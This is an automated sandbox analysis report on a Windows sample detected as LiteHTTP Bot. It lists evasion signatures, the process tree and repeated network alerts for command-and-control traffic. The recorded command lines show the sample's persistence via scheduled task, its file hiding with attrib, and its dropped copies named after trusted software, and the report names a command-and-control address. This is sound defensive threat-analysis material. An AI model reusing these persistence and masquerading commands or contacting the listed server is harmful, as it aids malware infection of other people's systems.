Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DQmU06kq9I.exe

Overview

General Information

Sample name:DQmU06kq9I.exe
renamed because original name is a hash value
Original sample name:d37dab4c59e707f632bb0b91eaa87ff9.exe
Analysis ID:1576609
MD5:d37dab4c59e707f632bb0b91eaa87ff9
SHA1:0e153debcf54805a0543646620511b57865d6fc9
SHA256:375a067be10250dc045ea14025444ad7ec0662cf189abbbd393e6f7ffe85b35d
Tags:exeuser-abuse_ch
Infos:

Detection

LiteHTTP Bot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
AI detected suspicious sample
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DQmU06kq9I.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: D37DAB4C59E707F632BB0B91EAA87FF9)
    • schtasks.exe (PID: 6448 cmdline: "schtasks" /Query /TN "DQmU06kq9I" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6304 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "DQmU06kq9I" /tr "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 1712 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5512 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 4856 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5960 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 6196 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 1516 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5504 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 4224 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2740 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3160 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
  • DQmU06kq9I.exe (PID: 2000 cmdline: C:\Users\user\Desktop\DQmU06kq9I.exe MD5: D37DAB4C59E707F632BB0B91EAA87FF9)
    • schtasks.exe (PID: 6788 cmdline: "schtasks" /Query /TN "DQmU06kq9I" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • DQmU06kq9I.exe (PID: 2680 cmdline: "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: D37DAB4C59E707F632BB0B91EAA87FF9)
    • schtasks.exe (PID: 4512 cmdline: "schtasks" /Query /TN "DQmU06kq9I" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2516 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 712 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 3960 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 5176 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 516 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • attrib.exe (PID: 2132 cmdline: "attrib.exe" +h +s "C:\Users\user\Desktop\DQmU06kq9I.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 2928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
    00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
      00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
        00000000.00000002.4541067680.0000000000552000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
          00000008.00000002.4541316207.0000000000552000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.DQmU06kq9I.exe.8ba0000.3.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
              9.2.DQmU06kq9I.exe.8ba0000.3.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                9.2.DQmU06kq9I.exe.8ba0000.3.unpackMALWARE_Win_CoreBotDetects CoreBotditekSHen
                • 0x8862:$v1_1: newtask
                • 0x7243:$v1_6: payload
                • 0x7446:$v1_7: DownloadFile
                • 0x7453:$v1_8: RemoveFile
                • 0x8814:$cnc1: &os=
                • 0x881e:$cnc2: &pv=
                • 0x8828:$cnc3: &ip=
                • 0x8832:$cnc4: &cn=
                • 0x883c:$cnc5: &lr=
                • 0x8846:$cnc6: &ct=
                • 0x8850:$cnc7: &bv=
                • 0x8872:$cnc8: &op=
                • 0x8880:$cnc9: &td=
                • 0x8894:$cnc10: &uni=
                0.2.DQmU06kq9I.exe.550000.0.unpackJoeSecurity_LiteHTTPBotYara detected LiteHTTP BotJoe Security
                  0.2.DQmU06kq9I.exe.550000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    Click to see the 22 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\DQmU06kq9I.exe, ProcessId: 5440, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DQmU06kq9I.lnk

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T10:20:19.143774+010028299091Malware Command and Control Activity Detected192.168.2.549826185.208.159.10980TCP
                    2024-12-17T10:20:36.924933+010028299091Malware Command and Control Activity Detected192.168.2.549867185.208.159.10980TCP
                    2024-12-17T10:20:56.558753+010028299091Malware Command and Control Activity Detected192.168.2.549908185.208.159.10980TCP
                    2024-12-17T10:21:13.643978+010028299091Malware Command and Control Activity Detected192.168.2.549948185.208.159.10980TCP
                    2024-12-17T10:21:29.722238+010028299091Malware Command and Control Activity Detected192.168.2.549979185.208.159.10980TCP
                    2024-12-17T10:21:32.560184+010028299091Malware Command and Control Activity Detected192.168.2.549980185.208.159.10980TCP
                    2024-12-17T10:21:38.143751+010028299091Malware Command and Control Activity Detected192.168.2.549981185.208.159.10980TCP
                    2024-12-17T10:21:44.722069+010028299091Malware Command and Control Activity Detected192.168.2.549982185.208.159.10980TCP
                    2024-12-17T10:21:55.440621+010028299091Malware Command and Control Activity Detected192.168.2.549983185.208.159.10980TCP
                    2024-12-17T10:21:57.144479+010028299091Malware Command and Control Activity Detected192.168.2.549984185.208.159.10980TCP
                    2024-12-17T10:22:12.722386+010028299091Malware Command and Control Activity Detected192.168.2.549985185.208.159.10980TCP
                    2024-12-17T10:22:15.331500+010028299091Malware Command and Control Activity Detected192.168.2.549986185.208.159.10980TCP
                    2024-12-17T10:22:30.612546+010028299091Malware Command and Control Activity Detected192.168.2.549987185.208.159.10980TCP
                    2024-12-17T10:22:31.612580+010028299091Malware Command and Control Activity Detected192.168.2.549988185.208.159.10980TCP
                    2024-12-17T10:22:37.331293+010028299091Malware Command and Control Activity Detected192.168.2.549989185.208.159.10980TCP
                    2024-12-17T10:22:47.518810+010028299091Malware Command and Control Activity Detected192.168.2.549990185.208.159.10980TCP
                    2024-12-17T10:22:56.440691+010028299091Malware Command and Control Activity Detected192.168.2.549991185.208.159.10980TCP
                    2024-12-17T10:23:14.518821+010028299091Malware Command and Control Activity Detected192.168.2.549992185.208.159.10980TCP
                    2024-12-17T10:23:21.638539+010028299091Malware Command and Control Activity Detected192.168.2.549993185.208.159.10980TCP
                    2024-12-17T10:23:24.690730+010028299091Malware Command and Control Activity Detected192.168.2.549995185.208.159.10980TCP
                    2024-12-17T10:23:32.971952+010028299091Malware Command and Control Activity Detected192.168.2.549996185.208.159.10980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T10:20:19.143774+010028197051Malware Command and Control Activity Detected192.168.2.549826185.208.159.10980TCP
                    2024-12-17T10:20:36.924933+010028197051Malware Command and Control Activity Detected192.168.2.549867185.208.159.10980TCP
                    2024-12-17T10:20:56.558753+010028197051Malware Command and Control Activity Detected192.168.2.549908185.208.159.10980TCP
                    2024-12-17T10:21:13.643978+010028197051Malware Command and Control Activity Detected192.168.2.549948185.208.159.10980TCP
                    2024-12-17T10:21:29.722238+010028197051Malware Command and Control Activity Detected192.168.2.549979185.208.159.10980TCP
                    2024-12-17T10:21:32.560184+010028197051Malware Command and Control Activity Detected192.168.2.549980185.208.159.10980TCP
                    2024-12-17T10:21:38.143751+010028197051Malware Command and Control Activity Detected192.168.2.549981185.208.159.10980TCP
                    2024-12-17T10:21:44.722069+010028197051Malware Command and Control Activity Detected192.168.2.549982185.208.159.10980TCP
                    2024-12-17T10:21:55.440621+010028197051Malware Command and Control Activity Detected192.168.2.549983185.208.159.10980TCP
                    2024-12-17T10:21:57.144479+010028197051Malware Command and Control Activity Detected192.168.2.549984185.208.159.10980TCP
                    2024-12-17T10:22:12.722386+010028197051Malware Command and Control Activity Detected192.168.2.549985185.208.159.10980TCP
                    2024-12-17T10:22:15.331500+010028197051Malware Command and Control Activity Detected192.168.2.549986185.208.159.10980TCP
                    2024-12-17T10:22:30.612546+010028197051Malware Command and Control Activity Detected192.168.2.549987185.208.159.10980TCP
                    2024-12-17T10:22:31.612580+010028197051Malware Command and Control Activity Detected192.168.2.549988185.208.159.10980TCP
                    2024-12-17T10:22:37.331293+010028197051Malware Command and Control Activity Detected192.168.2.549989185.208.159.10980TCP
                    2024-12-17T10:22:47.518810+010028197051Malware Command and Control Activity Detected192.168.2.549990185.208.159.10980TCP
                    2024-12-17T10:22:56.440691+010028197051Malware Command and Control Activity Detected192.168.2.549991185.208.159.10980TCP
                    2024-12-17T10:23:14.518821+010028197051Malware Command and Control Activity Detected192.168.2.549992185.208.159.10980TCP
                    2024-12-17T10:23:21.638539+010028197051Malware Command and Control Activity Detected192.168.2.549993185.208.159.10980TCP
                    2024-12-17T10:23:24.690730+010028197051Malware Command and Control Activity Detected192.168.2.549995185.208.159.10980TCP
                    2024-12-17T10:23:32.971952+010028197051Malware Command and Control Activity Detected192.168.2.549996185.208.159.10980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-17T10:20:18.128651+010028302381A Network Trojan was detected192.168.2.549826185.208.159.10980TCP
                    2024-12-17T10:20:35.925260+010028302381A Network Trojan was detected192.168.2.549867185.208.159.10980TCP
                    2024-12-17T10:20:55.472043+010028302381A Network Trojan was detected192.168.2.549908185.208.159.10980TCP
                    2024-12-17T10:21:12.644070+010028302381A Network Trojan was detected192.168.2.549948185.208.159.10980TCP
                    2024-12-17T10:21:28.706502+010028302381A Network Trojan was detected192.168.2.549979185.208.159.10980TCP
                    2024-12-17T10:21:31.550246+010028302381A Network Trojan was detected192.168.2.549980185.208.159.10980TCP
                    2024-12-17T10:21:37.207748+010028302381A Network Trojan was detected192.168.2.549981185.208.159.10980TCP
                    2024-12-17T10:21:43.738125+010028302381A Network Trojan was detected192.168.2.549982185.208.159.10980TCP
                    2024-12-17T10:21:54.362643+010028302381A Network Trojan was detected192.168.2.549983185.208.159.10980TCP
                    2024-12-17T10:21:56.034479+010028302381A Network Trojan was detected192.168.2.549984185.208.159.10980TCP
                    2024-12-17T10:22:11.660045+010028302381A Network Trojan was detected192.168.2.549985185.208.159.10980TCP
                    2024-12-17T10:22:14.222561+010028302381A Network Trojan was detected192.168.2.549986185.208.159.10980TCP
                    2024-12-17T10:22:29.597040+010028302381A Network Trojan was detected192.168.2.549987185.208.159.10980TCP
                    2024-12-17T10:22:30.456639+010028302381A Network Trojan was detected192.168.2.549988185.208.159.10980TCP
                    2024-12-17T10:22:36.347067+010028302381A Network Trojan was detected192.168.2.549989185.208.159.10980TCP
                    2024-12-17T10:22:46.487687+010028302381A Network Trojan was detected192.168.2.549990185.208.159.10980TCP
                    2024-12-17T10:22:55.472046+010028302381A Network Trojan was detected192.168.2.549991185.208.159.10980TCP
                    2024-12-17T10:23:13.456404+010028302381A Network Trojan was detected192.168.2.549992185.208.159.10980TCP
                    2024-12-17T10:23:21.034585+010028302381A Network Trojan was detected192.168.2.549993185.208.159.10980TCP
                    2024-12-17T10:23:23.706595+010028302381A Network Trojan was detected192.168.2.549995185.208.159.10980TCP
                    2024-12-17T10:23:31.987653+010028302381A Network Trojan was detected192.168.2.549996185.208.159.10980TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\OneDrive\autoit3.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\common files.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\google.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\internet explorer.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\java.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\jdownloader.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\microsoft office.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\microsoft.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\microsoft.net.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\msbuild.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\msecache.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\reference assemblies.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows defender.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows mail.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows media player.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows multimedia platform.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows nt.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows photo viewer.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows portable devices.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windows sidebar.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\OneDrive\windowspowershell.exeReversingLabs: Detection: 60%
                    Multi AV Scanner detection for submitted file
                    Source: DQmU06kq9I.exeReversingLabs: Detection: 60%
                    Source: DQmU06kq9I.exeVirustotal: Detection: 34%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\OneDrive\msbuild.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\mozilla maintenance service.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\jdownloader.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\msecache.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\mavdwwsoqjljtvhgturlqfwslqtpryboqwmbsicodmvqkq.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\google.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\windows mail.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\common files.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\java.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\windows defender.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\microsoft.net.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\microsoft.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\reference assemblies.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\microsoft office.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\internet explorer.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\OneDrive\autoit3.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: DQmU06kq9I.exeJoe Sandbox ML: detected

                    Bitcoin Miner

                    barindex
                    Found strings related to Crypto-Mining
                    Source: DQmU06kq9I.exeString found in binary or memory: CryptoNight
                    Source: DQmU06kq9I.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Projects\Anubis-Master\Bot\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: DQmU06kq9I.exe, DQmU06kq9I.exe, 00000009.00000003.2782245640.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4552478393.0000000008BA2000.00000004.00001000.00020000.00000000.sdmp, DQmU06kq9I.exe, 00000009.00000002.4541221969.0000000000552000.00000040.00000001.01000000.00000003.sdmp

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49826 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49826 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49867 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49826 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49867 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49867 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49948 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49908 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49908 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49908 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49948 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49948 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49983 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49982 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49983 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49983 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49989 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49982 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49982 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49979 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49989 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49988 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49989 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49992 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49990 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49992 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49988 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49992 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49979 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49979 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.5:49990 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.5:49990 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49993 -> 185.208.159.109:80
                    Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.5:49995 -> 185.208.159.109:80
